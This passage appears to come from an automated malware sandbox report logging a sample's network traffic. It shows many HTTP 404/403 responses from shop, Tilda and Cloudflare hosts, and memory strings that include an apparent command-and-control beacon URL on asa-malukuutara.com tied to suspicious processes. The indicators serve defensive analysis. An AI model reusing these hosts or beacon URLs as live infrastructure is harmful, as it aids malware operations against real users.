09-Oct-24 12:08:49 GMT; Domain=cannulafactory.top; Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68519428253vary: Accept-Encodingx-frame-options: DENYx-shopid: 68519428253x-shardid: 156content-language: en-HKx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Laxset-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:52 GMT; SameSite=Laxset-cookie: _shopify_y=3d162a42-eb70-4f01-aa59-ffd04ffcecbf; Expires=Thu, 09-Oct-25 11:38:52 GMT; Domain=cannulafactory.top; Path=/; SameSite=Laxset-cookie: _shopify_s=d6bd0a50-9099-4704-ac58-8121e8bbcbf4; Expires=Wed, 09-Oct-24 12:08:52 GMT; Domain=cannulafactory.top; Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68519428253vary: Accept-Encodingx-frame-options: DENYx-shopid: 68519428253x-shardid: 156content-language: en-HKx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Laxset-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:54 GMT; SameSite=Laxset-cookie: _shopify_y=77fdd3de-6657-4e10-9ca7-aefa942072f6; Expires=Thu, 09-Oct-25 11:38:54 GMT; Domain=cannulafactory.top; Path=/; SameSite=Laxset-cookie: _shopify_s=64c69e05-8692-4034-b483-b1d5831203db; Expires=Wed, 09-Oct-24 12:08:54 GMT; Domain=cannulafactory.top; Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:02 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:05 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:08 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:11 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 09 Oct 2024 11:39:52 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-09T11:39:57.5130416Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=ep8vbQ2A7sjFh3el; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMTSet-Cookie: __ddg10_=1728473998; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMTSet-Cookie: __ddg1_=dVDZzNIF1y2HLqrrm2Ip; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:39:58 GMTDate: Wed, 09 Oct 2024 11:39:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: 
center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=5mUOWJgRNxqEpNlA; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMTSet-Cookie: __ddg10_=1728474000; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMTSet-Cookie: __ddg1_=2rXAhEpSnOUQn1VCBC4Z; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:00 GMTDate: Wed, 09 Oct 2024 11:40:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: 
center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=hG4kKGcqtMixKh4C; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMTSet-Cookie: __ddg10_=1728474003; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMTSet-Cookie: __ddg1_=dQ6dBoD8cDhAPpTjSd6I; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:03 GMTDate: Wed, 09 Oct 2024 11:40:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: 
center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=g1KJrCKAbyTfnKRz; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMTSet-Cookie: __ddg10_=1728474006; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMTSet-Cookie: __ddg1_=nhkafp7zj4SxosVkXiVL; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:06 GMTDate: Wed, 09 Oct 2024 11:40:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 738Last-Modified: Tue, 27 Aug 2024 08:59:13 GMTETag: "2e2-620a674a57ae6"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 
2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 22 20 68 65 69 67 68 74 3d 22 38 38 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:40:48 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12492Content-Type: text/html; charset=UTF-8Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a e2 41 91 a9 97 16 10 4f e3 ba 28 37 0c 79 ab c8 48 a1 66 5e 09 7e d3 ba e9 8b 01 b9 64 8b 39 0a 0b c8 5b 50 88 e2 17 92 b6 33 8e 10 59 80 0c 8a c4 2e 6a 86 56 f3 22 f7 c2 ad cf 83 3e f4 2f e6 51 7b 6f ba 9d 83 0a 46 54 46 c7 7f d8 b6 65 b8 b3 2b 9e c2 a7 d0 b1 f3 d4 9d d2 d3 14 98 ec 29 ac a6 95 a7 10 c1 2b f1 14 8a 84 71 16 3d 85 99 bc 64 f2 29 44 04 e9 8b 47 05 aa 1f 0f 03 88 20 77 da e1 1c 75 a7 dd c7 94 3b ed 7e fd fe 20 77 fa 84 fe 68 6b 7d a7 11 d5 7d 57 2b 1f 54 c4 81 6f 36 96 ec 7a 0a cf 03 ad b5 93 4f e1 8b 5b 88 a1 53 5a fd 53 d6 5c 3d 
ef 93 b6 55 ca 52 26 d1 34 95 f3 f0 f6 6a 47 0b 38 81 68 12 8c 83 39 48 29 95 eb fb ea 06 6e c3 f9 d5 8c 9d a9 c0 90 4e 3c ed d5 13 47 74 b9 ee e3 a1 0e f4 a8 b7 6f eb c7 7d 35 56 e6 7b 7d d7 ce bb 42 13 d1 5f 2e 04 ac 78 ba 80 af fc 51 7f dd 06 78 2a 9d 76 ce f4 dd a3 ef ad da 69 e6 b4 7f f0 fa 10 f4 44 e8 26 4c 50 ee 69 b6 6f 81 c7 58 7f b9 55 e3 71 9a 48 58 3b 64 c4 93 57 d1 4c e0 bc 18 df 74 ed 03 4e 38 d1 ac 56 dd 49 39 56 c9 d5 22 b1 ab ab 17 03 13 cd b6 a6 6d bf eb 8b 0f 3c e1 84 b7 28 99 af 28 7d d6 3f 4c e7 23 79 67 ad 7a 0b 34 db 69 2f 34 cf f9 93 f2 0a 7d cc 66 e3 fd 51 61 62 ab 80 ae 0d 5d 4f 10 8a 54 db 50 f1 ac 11 30 a7 f2 6c d5 c4 b7 55 7f 1c d0 55 55 d9 9f fe 79 c2 4c 7e df 23 09 ef 3b 06 1e 8f b5 72 1a 35 2b 43 a8 08 0c a8 5e 5d f4 74 6c f2 a8 7e 3a 36 db 6d f4 74 dc 6a be 7d 3a 4a ce 9b a7 a3 4c 55 b6 b4 35 04 ba f1 e6 3a f0 2f 57 a2 b8 42 7d 70 b3 55 7f 2f 19 a1 d5 84 48 07 3a 1c be b9 b9 7c c4 76 1b 7f c4 26 e6 07 d7 69 f6 77 5f d9 37 69 41 87 69 94 a5 a6 1c 93 a0 07 e0 96 6e 5a 6e 3a 69 53 e3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:40:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12492Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:40:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12492Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:42:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:43:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tYBeVB1BZDJXyUAnHlenNutWz6%2FB%2Bqywr44Mw4MxVCnfeoHptJoQhhRDTx2ued3i4xa1jPRbBtaAJnhZ4OhOZ2QZJIC9kebQqT85%2FkJf6ox7xa5q12UEoEZbx9UHeHmBO7KJh9YT%2B3vbQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8cfe1c31af4c4358-EWRContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:42:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:43:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OB4sVnGlUHarp1LHVo5UOp6zl2Bi8YCcVI%2Fau3%2FrZPGbuRE8MyysLlOPEb%2FM5%2FHvaWtS15g%2FfFr4LxcLQnZGx782zVFvzbMpCOugJdEg%2FYaZ2aEtJzG2QsvdHM3K4DYc1%2F%2BJmIwBgIdtSg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8cfe1c4218f66a59-EWRContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:43:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:43:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qy8zvlpjrknXl5TIx%2FaUB1eqp5V%2B%2Bu6BUw%2FZGIxjUJpva3byG7H9v%2FkHaKTlhp9KyZEuEedWwhdclDRKsF8B9e8Ppw%2BUbuS3%2F4dEhP%2FHweB8SsyX4PBlu2XWIGpXHWzDSWmoZ7%2FVmLFADw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8cfe1c52899632fa-EWRContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:43:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:43:19 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3EcsDOe8LfYujcZ7b7XA9%2FHRmA6HkYKONCTgfG2sKuEpFT4gubH2Y%2B6JF57QmPKBaLrqTxADnq4tk9OSEDVzDYRBDK6WBItVE3O2rHxiNG96dBUAEn22fXVVqk4poOgJlW3LK38HX3%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cfe1c62fb7a726f-EWRData Ascii: 11ab<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" />
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004426000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9w
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodo
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
